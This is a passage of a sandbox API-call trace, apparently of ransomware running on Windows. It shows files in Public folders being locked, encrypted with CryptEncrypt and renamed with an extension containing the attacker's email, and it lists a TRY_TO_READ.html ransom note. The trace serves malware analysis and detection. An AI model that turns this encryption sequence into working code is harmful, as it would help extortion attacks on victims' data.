nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.577] FindNextFileW (in: hFindFile=0x48f270, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.577] FindNextFileW (in: hFindFile=0x48f270, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.577] CloseHandle (hObject=0x3cc) returned 1 [0122.577] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.577] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x3be)) [0122.577] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.577] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.577] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.578] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public\\Libraries9c354ca09c354b444c.lock") returned 49 [0122.578] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries9c354ca09c354b444c.lock" (normalized: "c:\\users\\public\\libraries9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.578] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.578] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.578] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4ca8 [0122.578] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Libraries\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f2b0 [0122.578] FindNextFileW (in: hFindFile=0x48f2b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.579] FindNextFileW (in: hFindFile=0x48f2b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.579] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4f4 [0122.579] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.579] LockFile (hFile=0x4f4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x58, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.579] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.579] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.579] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.579] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.579] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini", dwFileAttributes=0x80) returned 1 [0122.579] lstrlenW (lpString="C:\\\\Users\\Public\\Libraries\\desktop.ini") returned 38 [0122.579] GetProcessHeap () returned 0x410000 [0122.580] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xbc) returned 0x473050 [0122.580] lstrcpyW (in: lpString1=0x473050, lpString2="C:\\\\Users\\Public\\Libraries\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Libraries\\desktop.ini") returned="C:\\\\Users\\Public\\Libraries\\desktop.ini" [0122.580] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Libraries\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.580] GetFileSizeEx (in: hFile=0x4f4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=88) returned 1 [0122.580] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x58 [0122.580] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.580] GetProcessHeap () returned 0x410000 [0122.580] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.580] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.580] WriteFile (in: hFile=0x4f4, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.583] WriteFile (in: hFile=0x4f4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.584] WriteFile (in: hFile=0x4f4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.585] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x58) returned 0x444078 [0122.585] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x58) returned 0x4440d8 [0122.585] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.585] ReadFile (in: hFile=0x4f4, lpBuffer=0x444078, nNumberOfBytesToRead=0x58, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x444078*, lpNumberOfBytesRead=0x367f44c*=0x58, lpOverlapped=0x0) returned 1 [0122.585] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=-88, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.585] WriteFile (in: hFile=0x4f4, lpBuffer=0x4440d8*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4440d8*, lpNumberOfBytesWritten=0x367f44c*=0x58, lpOverlapped=0x0) returned 1 [0122.586] UnlockFile (hFile=0x4f4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x58, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.586] CloseHandle (hObject=0x4f4) returned 1 [0122.587] GetProcessHeap () returned 0x410000 [0122.587] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.587] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\libraries\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.589] GetProcessHeap () returned 0x410000 [0122.589] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0122.589] FindNextFileW (in: hFindFile=0x48f2b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0122.589] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4f4 [0122.589] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.590] LockFile (hFile=0x4f4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x36c, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.590] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.590] ReadFile (in: hFile=0x4f4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0122.591] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.591] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.591] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.591] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.591] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms", dwFileAttributes=0x80) returned 1 [0122.592] lstrlenW (lpString="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 48 [0122.592] GetProcessHeap () returned 0x410000 [0122.592] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd0) returned 0x477600 [0122.592] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms" | out: lpString1="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0122.592] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.592] GetFileSizeEx (in: hFile=0x4f4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=876) returned 1 [0122.592] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x36c [0122.592] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.592] GetProcessHeap () returned 0x410000 [0122.592] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.592] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.592] WriteFile (in: hFile=0x4f4, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.594] WriteFile (in: hFile=0x4f4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.595] WriteFile (in: hFile=0x4f4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x36c) returned 0x4e1b68 [0122.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x36c) returned 0x4e1ee0 [0122.596] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.596] ReadFile (in: hFile=0x4f4, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x36c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x36c, lpOverlapped=0x0) returned 1 [0122.596] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=-876, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.596] WriteFile (in: hFile=0x4f4, lpBuffer=0x4e1ee0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1ee0*, lpNumberOfBytesWritten=0x367f44c*=0x36c, lpOverlapped=0x0) returned 1 [0122.597] UnlockFile (hFile=0x4f4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x36c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.597] CloseHandle (hObject=0x4f4) returned 1 [0122.598] GetProcessHeap () returned 0x410000 [0122.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.598] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.600] GetProcessHeap () returned 0x410000 [0122.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0122.600] FindNextFileW (in: hFindFile=0x48f2b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32991270, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.600] FindNextFileW (in: hFindFile=0x48f2b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32991270, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.600] CloseHandle (hObject=0x3cc) returned 1 [0122.600] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.601] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x3ce)) [0122.601] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.601] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.601] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.601] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public\\Music9c354ca09c354b444c.lock") returned 45 [0122.601] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music9c354ca09c354b444c.lock" (normalized: "c:\\users\\public\\music9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.601] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.602] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.602] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4cf0 [0122.602] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Music\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0b80 [0122.602] FindNextFileW (in: hFindFile=0x4e0b80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.606] FindNextFileW (in: hFindFile=0x4e0b80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.606] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4f8 [0122.606] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.606] LockFile (hFile=0x4f8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17c, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.606] SetFilePointerEx (in: hFile=0x4f8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.606] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.606] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.606] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.606] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Music\\desktop.ini", dwFileAttributes=0x80) returned 1 [0122.607] lstrlenW (lpString="C:\\\\Users\\Public\\Music\\desktop.ini") returned 34 [0122.607] GetProcessHeap () returned 0x410000 [0122.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb4) returned 0x46e9d8 [0122.607] lstrcpyW (in: lpString1=0x46e9d8, lpString2="C:\\\\Users\\Public\\Music\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Music\\desktop.ini") returned="C:\\\\Users\\Public\\Music\\desktop.ini" [0122.607] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Music\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.607] GetFileSizeEx (in: hFile=0x4f8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=380) returned 1 [0122.607] SetFilePointer (in: hFile=0x4f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x17c [0122.607] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.607] GetProcessHeap () returned 0x410000 [0122.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.607] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.607] WriteFile (in: hFile=0x4f8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.609] WriteFile (in: hFile=0x4f8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.610] WriteFile (in: hFile=0x4f8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17c) returned 0x46a198 [0122.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17c) returned 0x4e1b68 [0122.612] SetFilePointer (in: hFile=0x4f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.612] ReadFile (in: hFile=0x4f8, lpBuffer=0x46a198, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a198*, lpNumberOfBytesRead=0x367f44c*=0x17c, lpOverlapped=0x0) returned 1 [0122.612] SetFilePointer (in: hFile=0x4f8, 